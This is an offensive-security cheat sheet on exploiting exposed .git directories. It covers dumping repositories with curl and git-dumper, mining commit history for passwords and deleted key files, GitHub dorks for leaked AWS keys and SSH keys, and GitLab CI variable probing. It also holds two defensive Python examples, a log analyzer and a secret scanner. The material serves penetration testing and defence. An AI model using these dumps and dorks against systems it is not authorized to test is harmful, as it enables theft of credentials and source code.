
# Git Hacking


## Detection

### Quick Check (One-liner)

```bash
# Quick .git exposure check: dump only if HEAD actually looks like a ref file
curl -s http://$rhost/.git/HEAD | grep -q "ref:" && git-dumper http://$rhost/.git ./git-dump
```

### Check for Exposed .git

```bash
# Test endpoints
curl -I http://$rhost/.git/HEAD
curl -I http://$rhost/.git/config
curl -I http://$rhost/.git/index

# Response with 200 = exposed
# Response with 403 = directory listing disabled, but individual files may still be readable
```

### Common Indicators

| Path | Purpose |
|---|---|
| `/.git/HEAD` | Current branch reference |
| `/.git/config` | Repository configuration (remotes, sometimes embedded credentials) |
| `/.git/index` | Staged files index (lists tracked paths) |
| `/.git/logs/HEAD` | HEAD reflog (recent commit history) |
| `/.git/objects/` | Git objects (commits, trees, blobs) |
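The same indicator paths, seen from the defender's side: an added example (not part of the original cheat sheet) that walks a web server's access log, counts requests under `/.git/` per client and separates mere probing (403/404) from confirmed exposure (a 2xx on any `.git` path, including direct object fetches that work even when the listing is denied). The log lines are constructed, and `analyze_git_probes` / `exposed_clients` are names chosen here.

```python
import re
from collections import defaultdict

# Any request under /.git/ is a probe; a 2xx on one confirms the repo is served.
GIT_PATH_RE = re.compile(r"^/\.git(/|$)")
# Direct object fetch: works even when the directory listing itself returns 403.
OBJECT_RE = re.compile(r"^/\.git/objects/[0-9a-f]{2}/[0-9a-f]{38}$")
# Combined Log Format: client - - [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample access log (addresses, times and hashes are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "HEAD /.git/HEAD HTTP/1.1" 200 23
203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /.git/config HTTP/1.1" 200 137
203.0.113.7 - - [10/Mar/2025:10:00:03 +0000] "GET /.git/objects/ HTTP/1.1" 403 162
203.0.113.7 - - [10/Mar/2025:10:00:04 +0000] "GET /.git/objects/0d/6c16323262136f864d93604ac317dcaeaa3a62 HTTP/1.1" 200 412
198.51.100.9 - - [10/Mar/2025:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.9 - - [10/Mar/2025:10:05:01 +0000] "GET /.git/HEAD HTTP/1.1" 404 153
"""

def analyze_git_probes(log_text):
    """Per-client counts of /.git/ requests, 2xx responses and direct object fetches."""
    stats = defaultdict(lambda: {"requests": 0, "served": 0, "objects": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        if not GIT_PATH_RE.match(path):
            continue
        s = stats[ip]
        s["requests"] += 1
        if status.startswith("2"):
            s["served"] += 1
        if OBJECT_RE.match(path):
            s["objects"] += 1
    return dict(stats)

def exposed_clients(stats):
    """Clients that got at least one 2xx for a .git path: exposure confirmed, not just probed."""
    return sorted(ip for ip, s in stats.items() if s["served"] > 0)

if __name__ == "__main__":
    result = analyze_git_probes(SAMPLE_LOG)
    for ip, s in sorted(result.items()):
        print(ip, s)
    print("exposure confirmed from:", exposed_clients(result))
```

A non-zero `objects` count alongside a 403 on `/.git/objects/` is the signature of the manual object download described below: denying the listing alone does not stop it.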

## Manual Extraction

### Step-by-Step

```bash
# 1. Check if .git is accessible
curl http://$rhost/.git/HEAD
# ref: refs/heads/master

# 2. Get config
curl http://$rhost/.git/config

# 3. Read logs
curl http://$rhost/.git/logs/HEAD

# 4. Download objects manually (if directory listing is disabled)
# Object path: .git/objects/XX/XXXXXX (first 2 hex chars of the hash = folder, remaining 38 = file name)
curl http://$rhost/.git/objects/0d/6c16323262136f864d93604ac317dcaeaa3a62
```

## Git Dumper Tools

### GitTools (gitdumper.sh)

```bash
# Clone
git clone https://github.com/internetwache/GitTools.git
cd GitTools/Dumper

# Dump repository
./gitdumper.sh http://$rhost/.git/ output_dir

# Extract objects
cd output_dir
git checkout -- .
```

### git-dumper (Python)

```bash
# Install
pip3 install git-dumper

# Dump
git-dumper http://$rhost/.git/ output_dir

# Navigate and analyze
cd output_dir
git log --oneline
```

### GitHack

```bash
# Clone
git clone https://github.com/lijiejie/GitHack.git
cd GitHack

# Run
python3 GitHack.py http://$rhost/.git/
```

## Git Analysis

### View Commit History

```bash
cd cloned_repo

# View all commits
git log

# One-line format
git log --oneline

# Show all branches
git log --all --oneline --graph
```

### Checkout Specific Commit

```bash
# Get commit ID from git log
git checkout <commit_id>

# Example
git checkout 0d6c16323262136f864d93604ac317dcaeaa3a62

# Restore all files from commit
git checkout -- .
```

### View Changes Between Commits

```bash
# Show diff between commits
git diff <commit1> <commit2>

# Show what changed in a specific commit
git show <commit_id>

# Show file content at a specific commit
git show <commit_id>:path/to/file
```

### Search for Secrets

```bash
# Search all history for a keyword
git log -p | grep -i password
git log -p | grep -i secret
git log -p | grep -i api_key
git log -p | grep -i token

# Search the history of a specific file
git log -p -- config.php
git log -p -- .env
```

## Sensitive Data Extraction

### Files to Look For

```text
# Configuration files
.env
config.php
settings.py
application.yml
web.config
appsettings.json

# Credential files
.htpasswd
.netrc
credentials.xml
secrets.yml

# Key files
id_rsa
id_dsa
*.pem
*.key
```

### Extract Credentials from History

```bash
# Find deleted files
git log --diff-filter=D --summary | grep delete

# Recover a deleted file
git log --all -- <deleted_file>
git show <commit_before_delete>:<file_path>

# Find files with passwords across every revision
git grep -n password $(git rev-list --all)
git grep -n secret $(git rev-list --all)
```

### Using truffleHog

```bash
# Install the legacy Python version (v2). The current Go version (v3) is a
# separate binary from trufflesecurity/trufflehog and has a different CLI.
pip3 install truffleHog

# v3 CLI: scan a local clone or a remote repo
trufflehog git file://./cloned_repo
trufflehog git https://github.com/user/repo.git

# v2 CLI: regex rules on, entropy check off
trufflehog --regex --entropy=False https://github.com/user/repo.git
```
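As an added example (not from the page, truffleHog or git-secrets) that combines the grep list under "Search for Secrets" with truffleHog's entropy idea: a small auditor for `git log -p` output that looks only at added lines, flags them first by keyword and otherwise by Shannon entropy of long base64/hex-looking runs, so a repository can be checked before it is ever exposed. The patch excerpt, hashes, values and the 4.0 bits/char threshold are constructed or assumed.

```python
import math
import re

# Keywords from the grep list above, applied only to added lines so that
# context and removed lines are not re-flagged.
KEYWORD_RE = re.compile(r"(password|secret|api_key|token)\s*[=:]\s*['\"]?([^\s'\"]+)", re.I)
# Base64/hex-looking runs, scored by Shannon entropy as truffleHog's entropy mode does.
CANDIDATE_RE = re.compile(r"[A-Za-z0-9+/]{20,}")
ENTROPY_THRESHOLD = 4.0  # bits/char; assumed cut-off, tune per repository

# Constructed `git log -p` excerpt (hashes and values are made up).
SAMPLE_PATCH = """\
commit 0d6c16323262136f864d93604ac317dcaeaa3a62
diff --git a/config.php b/config.php
+++ b/config.php
@@ -0,0 +1,3 @@
+<?php
+$db_password = "Sup3rS3cret!";
+$debug = true;
commit 1111111111111111111111111111111111111111
diff --git a/.env b/.env
+++ b/.env
@@ -1,2 +1,3 @@
-SIGNING_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+SIGNING_KEY=aB3dE5fG7hI9jK1lM3nO5pQ7rS9tU1vW3xY5z
 PLACEHOLDER=yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
+DEBUG=false
"""

def shannon_entropy(s):
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

def scan_patch(patch_text):
    """Return (commit, file, added_line, reason) for each suspicious added line."""
    findings, commit, path = [], None, None
    for line in patch_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[6:]
        elif line.startswith("+") and not line.startswith("+++"):
            body = line[1:]
            m = KEYWORD_RE.search(body)
            if m:
                findings.append((commit, path, body, f"keyword:{m.group(1).lower()}"))
            elif any(shannon_entropy(t) >= ENTROPY_THRESHOLD for t in CANDIDATE_RE.findall(body)):
                findings.append((commit, path, body, "high-entropy"))
    return findings
```

Feed it `git log -p --all` rather than a single branch, since the page's own point is that secrets survive in history and on other refs long after they are removed from the working tree.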

### Using git-secrets

```bash
# Install
git clone https://github.com/awslabs/git-secrets.git
cd git-secrets && make install

# Scan repository
git secrets --scan
git secrets --scan-history
```

## GitHub Dorking

### Search Operators

```text
# Find exposed passwords
filename:config password
filename:.env DB_PASSWORD
filename:wp-config.php

# Find API keys
filename:.npmrc _auth
filename:.dockercfg auth
extension:pem private

# Find credentials by organization or user
org:company password
user:username password

# Search in commit messages
committer:username password
```

### Common Dorks

```text
# Database credentials
filename:database.php password
filename:config.inc.php password

# AWS keys
AKIA extension:py
AKIA extension:sh

# SSH keys
filename:id_rsa
filename:id_dsa

# OAuth tokens
filename:.netrc password
filename:_netrc password
```

## GitLab Exploitation

### Exposed GitLab CI/CD Variables

```bash
# Check for .gitlab-ci.yml
curl http://$rhost/.gitlab-ci.yml

# CI variables might contain
# - AWS_SECRET_ACCESS_KEY
# - DEPLOY_PASSWORD
# - API_TOKEN
```

### GitLab API

```bash
# Get project info (public)
curl https://gitlab.example.com/api/v4/projects

# Get user info (quote the URL so the shell does not interpret the query string)
curl "https://gitlab.example.com/api/v4/users?username=admin"
```

## Automated Scanning

### Using Nuclei

```bash
nuclei -u http://$rhost -t exposures/configs/git-config.yaml
nuclei -u http://$rhost -t exposed-panels/git/
```

### Using ffuf

```bash
# Check git paths
ffuf -u http://$rhost/FUZZ -w /usr/share/seclists/Discovery/Web-Content/git.txt -mc 200
```

## Quick Reference

| Task | Command |
|---|---|
| Check exposure | `curl http://$rhost/.git/HEAD` |
| Dump repo | `git-dumper http://$rhost/.git/ out` |
| View commits | `git log --oneline` |
| Checkout commit | `git checkout <id>` |
| Search secrets | `git log -p \| grep password` |
| Recover deleted | `git show <commit>:<file>` |

## Common Workflow

```bash
# 1. Detect
curl -I http://$rhost/.git/HEAD

# 2. Dump
git-dumper http://$rhost/.git/ repo

# 3. Analyze
cd repo
git log --oneline
git log -p | grep -iE 'password|secret|key|token'

# 4. Checkout interesting commits
git checkout <commit_id>
cat config.php

# 5. Check for deleted sensitive files
git log --diff-filter=D --summary
git show <commit>:<deleted_file>
```

## 📚 See Also

- Related Web Attacks
- Credential Exploitation